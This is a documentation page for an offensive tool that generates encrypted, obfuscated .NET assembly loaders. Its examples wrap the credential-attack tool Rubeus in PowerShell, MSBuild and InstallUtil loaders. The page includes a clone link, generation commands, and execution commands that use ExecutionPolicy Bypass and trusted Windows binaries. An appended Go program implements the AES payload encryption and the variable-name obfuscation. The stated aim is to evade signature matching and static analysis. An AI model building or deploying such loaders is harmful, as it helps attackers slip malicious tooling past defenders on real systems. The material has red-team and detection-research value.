.:: go-assembly-ldr: Encrypted .NET Assembly Loaders ::.

[ Introduction ]

go-assembly-ldr generates loaders that embed an encrypted .NET assembly and decrypt and execute it in memory at runtime. Two encryption methods are supported: RC4 for lightweight obfuscation and AES-256 for stronger protection of the embedded payload. The tool also randomizes variable names in the generated loader, which makes static analysis and signature matching harder. Output can be a PowerShell script, an MSBuild project, or an InstallUtil-compatible source file, so the same assembly can be delivered through a script-based or a build-process execution context.

The source code is available at https://cgit.heqnx.com/go-assembly-ldr and can be cloned with:

$ git clone https://cgit.heqnx.com/go-assembly-ldr

[ Tool Usage ]

$ ./go-assembly-ldr-- -h
offensive security tool designed for generating encrypted and obfuscated loaders for .NET assemblies
author: heqnx - https://heqnx.com

usage of ./go-assembly-ldr--:
  -dotnet-architecture string
        .net architecture for msbuild: x86|x64 (default "x64")
  -e string
        encryption type: rc4|aes (default "rc4")
  -f string
        input file path
  -key-len int
        length of encryption key (default 32)
  -obf-len int
        length of obfuscated strings (default 8)
  -t string
        loader type: powershell|msbuild|installutil (default "powershell")

Note that -e aes requires -key-len 32, since AES-256 needs a 32-byte key; only RC4 accepts other key lengths, so -key-len can be varied freely only with -e rc4.

[ Tool Output Example ]

- Generate a PowerShell loader with AES encryption:

$ ./build/go-assembly-ldr-linux-amd64 \
    -f Rubeus.exe \
    -t powershell \
    -e aes \
    -obf-len 10 \
    -key-len 32
[inf] created "Rubeus.exe_reflective.ps1" containing "Rubeus.exe"
[inf] call assembly method with [.]::("arg1 arg2".Split())

- Generate an MSBuild loader with RC4 encryption:

$ ./build/go-assembly-ldr-linux-amd64 \
    -f Rubeus.exe \
    -t msbuild \
    -e rc4 \
    -obf-len 12 \
    -key-len 16 \
    -dotnet-architecture x86
[inf] created "Rubeus.exe_msbuild.csproj" containing "Rubeus.exe"
[inf] change "string[] = new string[] { "" };" to add arguments

[ Payload Execution ]

The generated loaders decrypt the embedded assembly and execute it in memory through System.Reflection.Assembly.Load, so no decrypted copy of the assembly is written to disk. Each loader type targets a specific execution context:

- PowerShell: executed with powershell -ExecutionPolicy Bypass -File .ps1. Suitable for script-based environments.
- MSBuild: executed with msbuild.exe .csproj. Suited to build-process execution. Modify the string[] array in the project file to pass arguments to the assembly.
- InstallUtil: compiled to a .NET executable with csc.exe and executed with InstallUtil.exe /U. The payload runs from the installer's uninstall method, which the /U switch invokes.

[ Technical Details ]

- Encryption: RC4 is a stream cipher used for lightweight encryption; AES-256 (CBC mode, PKCS7 padding) offers stronger protection. AES requires a 32-byte key, while RC4 supports variable key lengths. In both cases the loader carries the key together with the ciphertext, because it must decrypt without any external input; the encryption therefore defeats static signatures on the assembly itself, not an analyst who reads the loader.
- Obfuscation: variable names are replaced with random strings of user-specified length (-obf-len) by applying a regex-based substitution of <%=obf ... %> placeholders to the loader templates.
- Payload handling: the assembly is encrypted and then base64-encoded, and the matching decryption logic is embedded in the loader. For AES, a random initialization vector (IV) is generated and included with the ciphertext so the loader can decrypt it.
- Dependencies: relies on Go's crypto/aes, crypto/rand, and standard libraries for encryption and file handling.
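The following Go program is an added example illustrating the two mechanisms described under Technical Details (AES-256-CBC with PKCS7 padding and a random IV, base64 output, and regex-based <%=obf ... %> substitution of variable names). It is not go-assembly-ldr's own code. It assumes the IV is stored in front of the ciphertext (the page only says an IV is included) and that placeholders have the exact form <%=obf name %>; both are assumptions. The decrypt side is written in Go only so the round trip can be checked; in a real loader that logic lives in the PowerShell or C# template. The sample "assembly" is a constructed byte string, not a real PE.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
	"regexp"
)

// pkcs7Unpad strips PKCS#7 padding and rejects malformed input instead of handing garbage to Assembly.Load.
func pkcs7Unpad(data []byte, blockSize int) ([]byte, error) {
	if len(data) == 0 || len(data)%blockSize != 0 {
		return nil, errors.New("pkcs7: length not a multiple of block size")
	}
	n := int(data[len(data)-1])
	if n == 0 || n > blockSize || !bytes.Equal(data[len(data)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("pkcs7: bad padding")
	}
	return data[:len(data)-n], nil
}

// EncryptAES returns base64(IV || AES-256-CBC(PKCS7(assembly))). Storing the IV
// in front of the ciphertext is an assumption; the page only says an IV is included.
func EncryptAES(key, assembly []byte) (string, error) {
	if len(key) != 32 {
		return "", errors.New("aes: AES-256 needs a 32-byte key (-key-len 32)")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil { // crypto/rand: fresh IV per loader
		return "", err
	}
	n := aes.BlockSize - len(assembly)%aes.BlockSize // PKCS#7: n bytes of value n
	padded := append(append([]byte{}, assembly...), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(append(iv, ct...)), nil
}

// DecryptAES mirrors what the generated loader must do at runtime (there in PowerShell or C#).
func DecryptAES(key []byte, b64 string) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("aes: ciphertext too short or not block-aligned")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt, aes.BlockSize)
}

// obfPattern matches template placeholders of the assumed form <%=obf name %>.
var obfPattern = regexp.MustCompile(`<%=obf\s+(\w+)\s*%>`)

// RandomIdent returns a letters-only identifier of length n (modulo bias is harmless for variable names).
func RandomIdent(n int) string {
	const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
	b := make([]byte, n)
	if _, err := rand.Read(b); err != nil {
		panic(err) // crypto/rand failure is not recoverable here
	}
	for i := range b {
		b[i] = alphabet[int(b[i])%len(alphabet)]
	}
	return string(b)
}

// Obfuscate rewrites every <%=obf name %> to a random identifier; the same name maps to the same identifier.
func Obfuscate(template string, n int) (string, map[string]string) {
	names := map[string]string{}
	out := obfPattern.ReplaceAllStringFunc(template, func(m string) string {
		name := obfPattern.FindStringSubmatch(m)[1]
		if _, ok := names[name]; !ok {
			names[name] = RandomIdent(n)
		}
		return names[name]
	})
	return out, names
}

func main() {
	key := make([]byte, 32)
	rand.Read(key)
	b64, _ := EncryptAES(key, []byte("MZ\x90\x00constructed sample, not a real assembly"))
	pt, _ := DecryptAES(key, b64)
	out, _ := Obfuscate("$<%=obf key %> = '...'; [byte[]]$<%=obf blob %> = ...; $<%=obf key %>", 8)
	fmt.Printf("%d base64 chars, round trip ok: %v\n%s\n", len(b64), bytes.HasPrefix(pt, []byte("MZ")), out)
}
```

The strict PKCS7 check in pkcs7Unpad matters in practice: a loader that silently accepts bad padding hands a corrupted byte array to Assembly.Load and fails with a misleading BadImageFormatException rather than a clear decryption error. Mapping each placeholder name to one identifier is what keeps a template's own references ($key used in three places) consistent after substitution.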